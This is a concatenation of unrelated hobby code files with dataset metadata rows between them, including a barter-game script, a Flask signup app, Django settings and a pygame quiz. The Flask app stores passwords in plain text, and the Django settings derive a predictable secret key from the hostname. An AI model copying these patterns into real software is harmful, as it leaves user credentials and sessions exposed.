'''"You were looking to buy a ITEM?"''',
'''"Give me a price, and we shall make a compromise, yes?"''',
'''"Shoot away, and if the price is right, you might get it cheap,"''',
'''"You like my ITEM? I'll give it to you cheap!"''',
'''"How may I help you, and how much money will you give me?"''',
'''"Make an offer, any offer, and your kindness may reward you!"'''
]
OFFERNOT2 = [
'''"I'm angry!!"''',
'''"are you an idiot?!"''',
'''"or you'll get nothing."''',
'''"it's not that hard!"''',
'''"we're gonna have to discuss the price."''',
'''"we're cheap here!"''',
'''"it is a good day to buy a ITEM!"''',
'''"I do enjoy trading with you!"''',
'''"I like your attitude."''',
'''"it's great to do business together!"''',
'''"what a fine customer you are!"'''
]
# Player keeps saying the same offer
STREAK1 = [
'''"Give me a better offer or you're out!"''',
'''"How many times are you gonna offer the same price?!"''',
'''"You know, just saying the same offer over again won't work,"''',
'''"Offer something else!"''',
'''"That's the same offer as last time!"''',
'''"You already said that!"''',
'''"You're gonna have to offer something other than $OFFER,"'''
]
STREAK2 = [
'''"I'm angry!!"''',
'''"are you an idiot?!"''',
'''"this isn't very effective!"''',
'''"you're boring me!"''',
'''"I won't take it!"''',
'''"I'm not stupid, you know."''',
'''"you gotta switch things up a bit."''',
'''"show me something new."'''
]
# Accept the offer
ACCEPT1 = [
"NAME hesitated. ",
"NAME thought. ",
"NAME nodded. ",
"NAME smiled. ",
"NAME grinned. ",
"NAME clapped. "
]
ACCEPT2 = [
'''"I'll accept that."''',
'''"Okay, that seems reasonable."''',
'''"That's about right."''',
'''"I'll take it!"''',
'''"Thanks for buying at SHOP!"''',
'''"Have a great day!"'''
]
# Deny the offer
DENY1 = [
"NAME snarled. ",
"NAME scoffed. ",
"NAME frowned and narrowed his eyes. ",
"NAME disagreed. ",
"NAME shook his head. ",
"NAME thought. ",
"NAME hesitated. "
]
DENY2 = [
'''"Outrageous! Get out!"''',
'''"You think I'm dumb?"''',
'''"I don't think so."''',
'''"$COMPROMISE, nothing more, nothing less."''',
'''"I will take $COMPROMISE."''',
'''"How about $COMPROMISE?"''',
'''"I'm thinking $COMPROMISE?"''',
'''"What about $COMPROMISE?"'''
]
# Player decides to leave
LEAVE = [
'''"You want nothing?", he said, "Good riddens! Leave at once!"''',
'''NAME: "Begone then, human!"''',
'''"What?" he stammered, "b-but how could you not desire my beautiful ITEM?!"''',
'''NAME: "Goodbye!"''',
'''NAME: "Come back soon!"''',
'''NAME smiled, "Hope to see you again!"''',
'''NAME: "Don't leave, friend! NOOOOOOO!"'''
]
NOTENOUGHMONEY = [
'''NAME: "You idiot! You don't have enough money!"''',
'''NAME: "You can't afford that! Get out!"''',
'''NAME: "You're gonna need more money to buy that"''',
'''NAME: "Sorry, you don't have enough gold for that"''',
'''NAME: "Oh, you need more gold to buy that. Sorry!"'''
]
GETOUT = [
'''NAME fumed, "Get out of here!"'''
]
| jpsank/barter-game | params.py | params.py | py | 10,966 | python | en | code | 0 | github-code | 50 |
10942550044 | from flask import Flask, redirect, url_for, request,render_template
from sqlalchemy.orm import sessionmaker
from users import *
import os
from datetime import datetime
from sqlalchemy import desc
app = Flask(__name__)
# Engine and a single module-level session are created at import time;
# DATABASE_URL must be present in the environment.
# NOTE(review): create_engine and User appear to come from `from users import *` -- confirm.
# NOTE(review): one global session shared by all requests is not thread-safe;
# consider sqlalchemy.orm.scoped_session.
engine = create_engine(os.getenv("DATABASE_URL"), echo=True)
Session = sessionmaker(bind = engine)
session = Session()
@app.route("/admin")
def admin():
    # Render all users, newest first, in the admin table.
    usrs = session.query(User).order_by(desc(User.timestamp)).all()
    return render_template("/Admin.html", data = usrs)
@app.route("/")
def default():
    # The site root just forwards to the registration form.
    return redirect(url_for('register'))
@app.route('/success/<name>')
def success(name):
    # Confirmation page shown after a successful registration.
    return render_template("/Success.html", data = name)
@app.route('/register',methods = ['POST', 'GET'])
def register():
    """Show the registration form (GET) and create a new user (POST).

    POST expects form fields ``email``, ``psw`` and ``psw-repeat``.

    Fixes from review: the original ``except Exception(e):`` raised a
    NameError instead of catching; a GET request fell through and returned
    None (HTTP 500); the submitted password was printed to stdout; a
    ``return`` after the try/except was unreachable.
    """
    if request.method != 'POST':
        # Plain GET: just render the form.
        return render_template('/Register.html')
    user = request.form['email']
    pwd = request.form['psw']
    pwdcheck = request.form['psw-repeat']
    # Refuse duplicate registrations for the same email.
    existing = session.query(User).filter_by(user_id=user).all()
    if existing:
        return "User already exists"
    if pwd != pwdcheck:
        # Passwords do not match: let the user try again.
        return render_template('/Register.html')
    # NOTE(review): the password is stored in plain text -- it should be hashed.
    try:
        usr = User(user_id=user, pwd=pwd, timestamp=datetime.now())
        session.add(usr)
        session.commit()
        return redirect(url_for('success', name=user))
    except Exception:
        # Keep the shared session usable after a failed INSERT.
        session.rollback()
        return redirect(url_for('error'))
@app.route('/error')
def error():
    # Generic failure page used when registration fails.
    return render_template('/Fail.html')
if __name__ == '__main__':
app.run(debug = True)
| ashishk144/wp2 | Day3/application.py | application.py | py | 1,580 | python | en | code | 0 | github-code | 50 |
8964200296 | '''
Сформувати функцію для обчислення цифрового кореню натурального числа.
Цифровий корінь отримується наступним чином: необхідно скласти всі цифри заданого
числа, потім скласти всі цифри знайденої суми і повторювати процес до тих пір, поки
сума не буде дорівнювати однозначному числу, що і буде цифровим коренем заданого
числа
Виконав студент групи 122-А Андрощук Артем Олександрович
'''
'''Тут простіше буде використати рекурсивний метод, час його робити менший, та код легше читається'''
import timeit
# Ask which implementation of the digital root to benchmark.
print("1 - recursion;\n"
      "2 - iteration.")
flag = int(input("What do you want to use?"))
# No setup statements are needed for either snippet.
mysetup = ''''''
if flag == 2:
    # Iterative digital root: repeatedly replace the number with its digit sum.
    mycode = '''
n = int(input("Input your number: "))
s = str(n)
while len(s) > 1:
    n = 0;
    for i in s:
        n += int(i)
    s = str(n)
print("answer is: ", s)
'''
elif flag == 1:
    # Recursive digital root.
    mycode = '''
def root(x):
    if len(str(x))==1:
        return(x)
    else:
        return root(sum([int(i) for i in str(x)]))
n = int(input("Input your number: "))
print("answer is: ", root(n))
'''
# Time a single run of the chosen snippet (the measured time includes waiting for input()).
print("time of a program: ", timeit.timeit(setup=mysetup,
                                           stmt=mycode,
                                           number=1))
| androshchyk11/lab10 | 2.py | 2.py | py | 1,643 | python | uk | code | 0 | github-code | 50 |
28014556955 | from django.conf.global_settings import * # NOQA
import hashlib
import os
import os.path
import socket
import sys
import urlparse
DEBUG = False
TEMPLATE_DEBUG = True
ADMINS = ()
INTERNAL_IPS = ('127.0.0.1',)
MANAGERS = ADMINS
APPEND_SLASH = True
PROJECT_ROOT = os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.insert(0, os.path.normpath(os.path.join(PROJECT_ROOT, os.pardir)))
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'ethnoua_geo',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
# Allow a DATABASE_URL environment variable (e.g. postgres://user:pass@host:port/name)
# to override the database settings above.
if 'DATABASE_URL' in os.environ:
    url = urlparse.urlparse(os.environ['DATABASE_URL'])
    # Ensure default database exists.
    DATABASES['default'] = DATABASES.get('default', {})
    # Update with environment configuration.
    DATABASES['default'].update({
        'NAME': url.path[1:],  # strip the leading '/' from the URL path
        'USER': url.username,
        'PASSWORD': url.password,
        'HOST': url.hostname,
        'PORT': url.port,
    })
    # Pick the engine matching the URL scheme.
    if url.scheme == 'postgres':
        DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'
    if url.scheme == 'mysql':
        DATABASES['default']['ENGINE'] = 'django.db.backends.mysql'
EMAIL_SUBJECT_PREFIX = '[Ethnoua] '
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
USE_TZ = True
# Make this unique, and don't share it with anybody.
# NOTE(review): the key is derived from the machine hostname with MD5, so it is
# predictable and silently changes if the host is renamed -- consider a random
# key kept out of source control.
SECRET_KEY = hashlib.md5(socket.gethostname() + ')*)&8a36)6%74e@-ne5(-!8a(vv#tkv)(eyg&@0=zd^pl!7=y@').hexdigest()
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'ethnoua.conf.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, 'templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.csrf',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'django.contrib.gis',
'django_extensions',
'gunicorn',
'storages',
'south',
'ethnoua'
)
SOUTH_MIGRATION_MODULES = {
'ethnoua': 'ethnoua.migrations',
}
STATIC_ROOT = os.path.realpath(os.path.join(PROJECT_ROOT, 'static'))
STATIC_URL = '/_static/'
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
AWS_STORAGE_BUCKET_NAME = 'ethnoua'
LOCALE_PATHS = (
os.path.join(PROJECT_ROOT, 'locale'),
)
| ethnoua/ethnoua | src/ethnoua/conf/server.py | server.py | py | 4,425 | python | en | code | 0 | github-code | 50 |
30537171697 | import copy
import asyncio
import hashlib
from itertools import count
from typing import Optional
import printer
import conf_loader
import exceptions
from web_session import WebSession
from tasks.login import LoginTask
class User:
    """One Bilibili account: credentials, isolated HTTP sessions, request
    signing, and centralised relogin handling for the monitor."""
    # Class-level counter that hands out sequential ids to User instances.
    _ids = count(0)
    __slots__ = (
        'id', 'name', 'password', 'alias',
        'bililive_session', 'login_session', 'other_session',
        'dict_bili', 'app_params',
        '_waiting_login', '_loop'
    )
    def __init__(
            self, dict_user: dict, dict_bili: dict):
        """Build a user from its own config (*dict_user*) and the shared app config (*dict_bili*)."""
        self.id = next(self._ids)
        self.name = dict_user['username']
        self.password = dict_user['password']
        self.alias = dict_user.get('alias', self.name)
        # Independent sessions for live-room requests, login requests, and everything else.
        self.bililive_session = WebSession()
        self.login_session = WebSession()
        self.other_session = WebSession()
        # Every user is handed the same dict, so it must be isolated (deep copy);
        # otherwise updating cookies and similar fields would overwrite other users.
        self.dict_bili = copy.deepcopy(dict_bili)
        # Fixed app-level query parameters, later sorted and signed by sort_and_sign().
        self.app_params = [
            f'actionKey={dict_bili["actionKey"]}',
            f'appkey={dict_bili["appkey"]}',
            f'build={dict_bili["build"]}',
            f'device={dict_bili["device"]}',
            f'mobi_app={dict_bili["mobi_app"]}',
            f'platform={dict_bili["platform"]}',
        ]
        self.update_login_data(dict_user)
        # Future that is pending while a relogin is in progress; None otherwise.
        self._waiting_login = None
        self._loop = asyncio.get_event_loop()
    def update_login_data(self, login_data):
        """Merge *login_data* into dict_bili (mirroring 'cookie' into both header
        dicts) and persist it through conf_loader."""
        for i, value in login_data.items():
            self.dict_bili[i] = value
            if i == 'cookie':
                self.dict_bili['pcheaders']['cookie'] = value
                self.dict_bili['appheaders']['cookie'] = value
        conf_loader.write_user(login_data, self.id)
    def is_online(self):
        """Truthy if both the PC and app headers currently carry a cookie."""
        return self.dict_bili['pcheaders']['cookie'] and self.dict_bili['appheaders']['cookie']
    def info(
            self,
            *objects,
            with_userid=True,
            **kwargs):
        """Log via printer.info, by default tagged with this user's id and alias."""
        if with_userid:
            printer.info(
                *objects,
                **kwargs,
                extra_info=f'用户id:{self.id} 名字:{self.alias}')
        else:
            printer.info(*objects, **kwargs)
    def infos(self):
        # Placeholder; intentionally does nothing at the moment.
        pass
    def warn(self, *objects, **kwargs):
        """Log a warning via printer.warn, tagged with this user's id and alias."""
        printer.warn(
            *objects,
            **kwargs,
            extra_info=f'用户id:{self.id} 名字:{self.alias}')
    def sort_and_sign(self, extra_params: Optional[list] = None) -> str:
        """Return the query string of app params (+ sorted *extra_params*) with the
        Bilibili md5 app_secret signature appended."""
        if extra_params is None:
            text = "&".join(self.app_params)
        else:
            text = "&".join(sorted(self.app_params+extra_params))
        text_with_appsecret = f'{text}{self.dict_bili["app_secret"]}'
        sign = hashlib.md5(text_with_appsecret.encode('utf-8')).hexdigest()
        return f'{text}&sign={sign}'
    async def req_s(self, func, *args):
        """Run ``await func(*args)``, transparently re-logging-in on LogoutError.

        Only one coroutine performs the relogin; every other request waits on the
        shared ``_waiting_login`` future and retries afterwards. ForbiddenError
        simply backs off for 600 seconds before retrying.
        """
        while True:
            if self._waiting_login is None:
                try:
                    return await func(*args)
                except exceptions.LogoutError:  # logout
                    if self._waiting_login is None:  # no relogin is currently being handled
                        self.info('判定出现了登陆失败,且未处理')
                        self._waiting_login = self._loop.create_future()
                        try:
                            await LoginTask.handle_login_status(self)
                            self.info('已经登陆了')
                        except asyncio.CancelledError:
                            # Cancelled mid-login: waiting_login is still resolved in the
                            # finally below, otherwise later requests would block forever.
                            raise
                        finally:
                            self._waiting_login.set_result(-1)
                            self._waiting_login = None
                    else:  # another coroutine is already handling the relogin
                        self.info('判定出现了登陆失败,已经处理')
                        await self._waiting_login
                except exceptions.ForbiddenError:
                    await asyncio.sleep(600)  # simple fixed back-off
            else:
                await self._waiting_login
    def print_status(self):
        """Print this user's current status header via info()."""
        self.info('当前用户的状态:', None)
| yjqiang/YjMonitor | monitor/user.py | user.py | py | 4,368 | python | en | code | 53 | github-code | 50 |
74679864475 | import json
# Load the configuration mapping from disk.
with open('config.json') as config_file:
    config = json.load(config_file)

# Render it as a markdown-style bullet list.
print('## Configuration')
for setting, value in config.items():
    print('* {}: {}'.format(setting, value))
| LearnerMN/Algorithm-Problems | uploader.py | uploader.py | py | 232 | python | en | code | 1 | github-code | 50 |
14349367715 | import sys
# Rebind input to sys.stdin.readline for faster bulk reads (shadows the builtin on purpose).
input = sys.stdin.readline
# T = number of test cases.
T = int(input())
def oneAndTwo(n):
    """Count the partitions of *n* into 1s and 2s: one per possible number of 2s (0..n//2)."""
    return 1 + n // 2
for _ in range(T):
    n = int(input())
    answer = 0
    # Count partitions of n into 1s, 2s and 3s: fix the number of 3s (i),
    # then oneAndTwo() counts the 1/2-only partitions of the remainder.
    for i in range(n // 3 + 1):
        answer += oneAndTwo(n - 3*i)
print(answer) | Ohjintaek/Algorithm | Baekjoon/15989.py | 15989.py | py | 239 | python | en | code | 0 | github-code | 50 |
41630766675 | import requests
import csv
import os
from bs4 import BeautifulSoup
from unicodedata import normalize
from pathlib import Path
csvFileName = "alkohol.csv"
txtFileName = "alkohol.txt"
category = Path(txtFileName).stem
def getData(url):
headers = {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Max-Age': '3600',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
req = requests.get(url, headers)
soup = BeautifulSoup(req.content.decode('utf-8', 'ignore'), 'html.parser')
return soup
def parseUrl(url, ind):
data = getData(url)
size, package, code = getProductInfo(data)
images = getProductImages(data)
brand, product = getProductTitle(data)
description = getProductDescription(data)
rate = getProductRating(data)
extras = {"nutritional" : getNutritional(data), "package": package}
fields=[ind, code, size, brand, size, category, description, extras, images, "", "", "", "Swiadome zakupy", "", product, url, ""]
writeRowToCsv(fields)
def getProductInfo(data):
div = data.find("div", class_="well well-small")
divContent = div.contents[1].contents
size, package, code = "", "", ""
if len(divContent) > 1:
size = divContent[1]
if len(divContent) > 3:
package = divContent[3]
if len(divContent) > 5:
code = divContent[5]
return size, package, code
def getProductImages(data):
images = []
thumbnailDivs = data.find_all("div", class_="thumbnail")
for div in thumbnailDivs:
for a in div.find_all('a'):
images.append(a.get('href'))
for a in data.find_all("a", class_="thumbnail"):
images.append(a.get('href'))
return images
def getProductTitle(data):
div = data.find("div", class_="span5")
brand = div.find("h2").contents[0]
product = div.find("h3").contents[0]
return brand, product
def getProductDescription(data):
div = data.find("div", class_="span5")
desc = div.find("p").contents[0]
return desc
def getProductRating(data):
return data.find("h1", class_="rate-winner").contents[0]
def getNutritional(data):
div = data.find("div", class_="nutritional")
nutritional = ""
if div is None:
return nutritional
for nutritionalData in div.find_all('p'):
nutritional = nutritional + nutritionalData.text + ", "
return nutritional
def writeRowToCsv(fields):
isFileExists = os.path.isfile(csvFileName) and os.path.getsize(csvFileName) > 0
with open(csvFileName, 'a', encoding='utf-8') as f:
writer = csv.writer(f)
if not isFileExists:
writer.writerow(",EAN,amount,brand,capacity,category,description,extras,image_url,ingredients,origin,price,seller,storage,title,url,weight".split(','))
writer.writerow(fields)
# Using readlines()
file = open(txtFileName, 'r')
urls = file.readlines()
for ind, url in enumerate(urls):
parseUrl(url, ind)
| Qlanowski/padt | swiadomezakupy/SwiadomeZakupyScrapper.py | SwiadomeZakupyScrapper.py | py | 3,098 | python | en | code | 0 | github-code | 50 |
17060508538 | import pygame
import pygame.gfxdraw
import sys
import time
import random
# the Label class is this module below
from label import *
pygame.init()
pygame.mixer.init()
#hit = pygame.mixer.Sound("sounds/hit.wav")
screen = pygame.display.set_mode((800, 800))
clock = pygame.time.Clock()
buttons = pygame.sprite.Group()
class Button(pygame.sprite.Sprite):
    ''' A button treated like a Sprite... and killed too

    Renders a text label, draws itself in one of two styles, swaps colors
    on hover, and invokes `command` once per physical press. Instances add
    themselves to the module-level `buttons` group on creation.
    '''
    def __init__(self, position, text, size,
                 colors="white on blue",
                 hover_colors="red on green",
                 style="button1",
                 borderc=(255,255,255),
                 command=lambda: print("No command activated for this button")):
        # the hover_colors attribute needs to be fixed
        super().__init__()
        # NOTE(review): `num` is never assigned or read in this class —
        # this declaration looks vestigial; confirm before removing.
        global num
        self.text = text
        self.command = command
        # --- colors ---
        # Colors are given as "fg on bg" strings and split into parts.
        self.colors = colors
        self.original_colors = colors
        self.fg, self.bg = self.colors.split(" on ")
        # Default hover scheme = inverted normal scheme.
        if hover_colors == "red on green":
            self.hover_colors = f"{self.bg} on {self.fg}"
        else:
            self.hover_colors = hover_colors
        self.style = style
        self.borderc = borderc # for the style2
        # font
        self.font = pygame.font.SysFont("Arial", size)
        self.render(self.text)
        self.x, self.y, self.w , self.h = self.text_render.get_rect()
        self.x, self.y = position
        # Click rect is a fixed 500px wide, independent of the text width.
        self.rect = pygame.Rect(self.x, self.y, 500, self.h)
        self.position = position
        # 1 = released, 0 = currently held down (debounce latch for click()).
        self.pressed = 1
        # the groups with all the buttons
        buttons.add(self)
    def render(self, text):
        """Render `text` into a surface used as the sprite image."""
        # we have a surface
        self.text_render = self.font.render(text, 1, self.fg)
        # memorize the surface in the image attributes
        self.image = self.text_render
    def update(self):
        """Per-frame: redraw the button and process hover/click input."""
        self.fg, self.bg = self.colors.split(" on ")
        if self.style == "button1":
            self.draw_button1()
        elif self.style == "button2":
            self.draw_button2()
        # Buttons without a command (e.g. row numbers) are inert.
        if self.command != None:
            self.hover()
            self.click()
    def draw_button1(self):
        ''' draws 4 lines around the button and the background '''
        # horizontal up
        pygame.draw.line(screen, (150, 150, 150), (self.x, self.y), (self.x + self.w , self.y), 5)
        pygame.draw.line(screen, (150, 150, 150), (self.x, self.y - 2), (self.x, self.y + self.h), 5)
        # horizontal down
        pygame.draw.line(screen, (50, 50, 50), (self.x, self.y + self.h), (self.x + self.w , self.y + self.h), 5)
        pygame.draw.line(screen, (50, 50, 50), (self.x + self.w , self.y + self.h), [self.x + self.w , self.y], 5)
        # background of the button
        pygame.draw.rect(screen, self.bg, (self.x, self.y, self.w , self.h))
    def draw_button2(self):
        ''' a linear border '''
        # Fixed-width (500px) background bar shifted 50px left of the text.
        pygame.draw.rect(screen, self.bg, (self.x - 50, self.y, 500 , self.h))
        pygame.gfxdraw.rectangle(screen, (self.x - 50, self.y, 500 , self.h), self.borderc)
    def check_collision(self):
        """Swap to hover colors while the mouse is inside the click rect."""
        if self.rect.collidepoint(pygame.mouse.get_pos()):
            # you can change the colors when the pointer is on the button if you want
            self.colors = self.hover_colors
            # pygame.mouse.set_cursor(*pygame.cursors.diamond)
        else:
            self.colors = self.original_colors
            # pygame.mouse.set_cursor(*pygame.cursors.arrow)
    def hover(self):
        ''' checks if the mouse is over the button and changes the color if it is true '''
        self.check_collision()
    def click(self):
        ''' checks if you click on the button and makes the call to the action just one time'''
        if self.rect.collidepoint(pygame.mouse.get_pos()):
            # `pressed` latches to 0 until the button is released, so the
            # command fires once per physical press, not once per frame.
            if pygame.mouse.get_pressed()[0] and self.pressed == 1:
                print("The answer is:'" + self.text + "'")
                self.command()
                self.pressed = 0
        if pygame.mouse.get_pressed() == (0,0,0):
            self.pressed = 1
# ACTION FOR BUTTON CLICK ================
def on_click():
    """Placeholder handler; not wired to any of the answer buttons below."""
    print("Click on one answer")
def on_right():
    """Handler bound to the correct answer's button."""
    check_score("right")
def on_false():
    ''' if there is no 'right' as arg it means it's false '''
    # check_score() defaults its argument to "wrong".
    check_score()
def check_score(answered="wrong"):
    ''' here we check if the answer is right

    Advances the quiz state: bumps `points` when `answered == "right"`,
    moves to the next question (updating all labels and rebuilding the
    buttons), and on the final question shows the end-of-game score.
    '''
    global qnum, points
    # until there are questions (before last)
    #hit.play() # click sound
    if qnum < len(questions):
        print(qnum, len(questions))
        if answered == "right":
            time.sleep(.1) # to avoid adding more point when pressing too much
            points += 1
            # Show the score text
        qnum += 1 # counter for next question in the list
        score.change_text(str(points))
        # Change the text of the question
        title.change_text(questions[qnum-1][0], color="white")
        # change the question number
        num_question.change_text(str(qnum))
        show_question(qnum) # delete old buttons and show new
    # for the last question...
    elif qnum == len(questions):
        print(qnum, len(questions))
        if answered == "right":
            kill()
            time.sleep(.1)
            points +=1
            # Final score message (Portuguese: "Your record is ...").
            score.change_text("Seu record é de " + str(points))
            time.sleep(.5)
# the first answer is right: it will be shuffled, don't worry
# ============================================================
# Each entry is [question_text, [answers]]; answers[0] is always the correct
# one — show_question() shuffles the row positions before display.
questions = [
    ["What is the correct file extension for Python files?",
    [".py", ".pt", ".ppt", ".pdf"]],
    ["Which method can be used to remove any whitespace from both the beginning and the end of a string?",
    ["strip()", "trip()", "trim()", "len()"]],
    ["Which operator is used to multiply numbers?",
    ["*", "+", "-", "/"]],
    ]
# =========== END OF QUESTIONS AND ANSWERS =================
def show_question(qnum):
    ''' Show questions: build the four numbered rows of answer buttons.

    The correct answer is stored first in the question data, but the row
    y-positions are shuffled before the answers are laid out, so it ends
    up at a random row. (Cleanup: removed a dead `pass` statement that sat
    inside the answer-button loop.)
    '''
    pos = [180,218,256,294]  # y coordinates of the four answer rows
    kill() # Kills the previous buttons/sprites
    def numbers():
        ''' inner function: THE NUMBERS OF THE QUESTION IN ORDER 1 2 3 4 '''
        # position of the numbers
        for n in range(4):
            Button((10, pos[n]),
                f"{n+1} ",
                36,
                "darkred on yellow",
                hover_colors="darkred on orange",
                style="button2",
                borderc=(255,255,0),
                command=None)
    def questions_shuffler():
        # show numbers and answers text
        # ============== TEXT: question and answers ====================
        # Answer index 0 is the right one, so only it triggers on_right.
        comm =[on_right, on_false, on_false, on_false]
        for n in range(4):
            Button(
                (50, pos[n]),
                questions[qnum-1][1][n],
                36,
                "blue on yellow",
                hover_colors="blue on orange",
                style="button2",
                borderc=(255,255,0),
                command=comm[n])
    numbers()
    random.shuffle(pos) # randomized, so that the right one is not on top
    questions_shuffler()
def kill():
    ''' delete buttons when go to the next question '''
    # sprites() returns a copied list, so removal while looping is safe.
    for sprite in buttons.sprites():
        sprite.kill()
# Quiz state: 1-based current question number and running score.
qnum = 1
points = 0
# ================= SOME LABELS ==========================
# Label comes from the star-import of the local `label` module;
# signature appears to be (surface, text, x, y[, size], color=...).
num_question = Label(screen, str(qnum), 0, 0)
title = Label(screen, questions[qnum-1][0], 10, 10, 50, color="cyan")
score = Label(screen, "AV2 Programming", 50, 335)
write1 = Label(screen, "Maria Eduarda, Joana, Rafaela, Rafael", 50, 360, 20, color="white")
def start_again():
    """Not implemented: restarting the quiz is not supported yet."""
    pass
def loop():
    """Main game loop: draws buttons/labels each frame at 60 FPS.

    NOTE(review): pygame.quit() is called on QUIT/ESC without breaking out
    of the loop, so the next pygame call after quitting would raise —
    confirm intended behavior.
    """
    global game_on
    show_question(qnum)
    while True:
        screen.fill(0)
        for event in pygame.event.get(): # ====== quit / exit
            if (event.type == pygame.QUIT):
                pygame.quit()
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_ESCAPE:
                    pygame.quit()
        buttons.update() # update buttons
        buttons.draw(screen)
        # show_labels presumably comes from `from label import *` — verify.
        show_labels()
        # update labels
        # Winning condition: all 3 questions answered correctly.
        if points == 3:
            winimg = pygame.image.load("python_pygame.png")
            screen.blit(winimg, (100, 100))
        clock.tick(60)
        pygame.display.update()
# NOTE(review): quitting pygame at import time looks vestigial — loop()
# is started below only after a fresh pygame.init(); confirm before removing.
pygame.quit()
if __name__ == '__main__':
    pygame.init()
    game_on = 1
loop() | Gravery/anime-selector | example.py | example.py | py | 8,260 | python | en | code | 0 | github-code | 50 |
9774737646 | class DictTrafo(object):
def __init__(self, trafo_dict=None, prefix=None):
if trafo_dict is None:
trafo_dict = {}
self.trafo_dict = trafo_dict
if type(prefix) is str:
self.prefix = (prefix,)
elif type(prefix) is tuple:
self.prefix = prefix
else:
self.prefix = None
def transform(self, in_dict, trafo_dict=None, keep_none=False):
if trafo_dict is None:
trafo_dict = self.trafo_dict
res = {}
for key in trafo_dict:
val = trafo_dict[key]
tval = type(val)
# sub dict
if tval is dict:
vres = self.transform(in_dict, val)
# (callable, rel_path)
elif tval is tuple and len(val) == 2 and callable(val[0]):
rel_path = self.read_rel_path(val[1], in_dict)
vres = val[0](key, rel_path)
# a rel_path in in_dict
elif tval in (str, tuple, list):
vres = self.read_rel_path(val, in_dict)
# invalid
else:
raise ValueError("invalid type in trafo_dict: %s" + val)
if vres is not None or keep_none:
res[key] = vres
return res
def read_rel_path(self, path, in_dict):
abs_path = []
if self.prefix:
abs_path += self.prefix
if type(path) is str:
abs_path.append(path)
else:
abs_path += path
return self.read_path(abs_path, in_dict)
def read_path(self, path, in_dict):
if len(path) == 0:
return in_dict
if type(in_dict) is not dict:
return None
key = path[0]
if key in in_dict:
val = in_dict[key]
path = path[1:]
return self.read_path(path, val)
| cnvogelg/amitools | amitools/vamos/cfgcore/trafo.py | trafo.py | py | 1,867 | python | en | code | 235 | github-code | 50 |
71623147035 | # -*- coding: utf-8 -*-
from PyQt4 import QtGui, QtCore
class MyTextPassage(QtGui.QGraphicsWidget):
    """Graphics-scene widget that paints a headline followed by body text,
    word-wrapped inside a fixed-height box of the given width."""
    def __init__(self, text, headline, width, font, parent=None):
        QtGui.QGraphicsWidget.__init__(self, parent)
        self.text = text
        self.headline = headline
        self.font = font
        # Fixed box: caller-supplied width, hard-coded 100px height.
        self.label_width = width
        self.label_height = 100
    def sizeHint(self, which, constraint=QtCore.QSizeF()):
        # NOTE(review): the QSizeF() default is evaluated once at definition
        # time; harmless while it is never mutated, but worth confirming.
        return QtCore.QSizeF(self.label_width, self.label_height)
    def paint(self, painter, option, widget):
        """Draw headline + text with a 1px black pen, left-aligned, wrapped."""
        qp = QtGui.QPen()
        qp.setWidth(1)
        qp.setBrush(QtCore.Qt.black)
        painter.setPen(qp)
        text_rect = QtCore.QRect(0, 0,
                                 self.label_width, self.label_height)
        painter.setFont(self.font)
        painter.drawText(text_rect, QtCore.Qt.TextWordWrap | QtCore.Qt.AlignLeft,
                         self.headline + "\n" + self.text)
| CrazyCrud/interactiondesign-python | drill4_interaction_techniques/MyTextPassage.py | MyTextPassage.py | py | 907 | python | en | code | 1 | github-code | 50 |
13142596165 | import os
from pkg_resources import resource_filename
from click.testing import CliRunner
import pandas as pd
from qupid.cli.cli import qupid
def test_cli():
    """End-to-end test of `qupid shuffle` via click's CliRunner.

    Splits the bundled ASD metadata into focus (diagnosed) and background
    (no condition) cohorts, runs 15 matching iterations on sex (discrete)
    and age within 10 years (numeric), and checks the output case-match
    table has one row per focus sample and one column per iteration.
    """
    runner = CliRunner()
    metadata_fpath = resource_filename("qupid", "tests/data/asd.tsv")
    metadata = pd.read_table(metadata_fpath, sep="\t", index_col=0)
    # Exact strings used in the dataset's "asd" column.
    asd_str = (
        "Diagnosed by a medical professional (doctor, physician "
        "assistant)"
    )
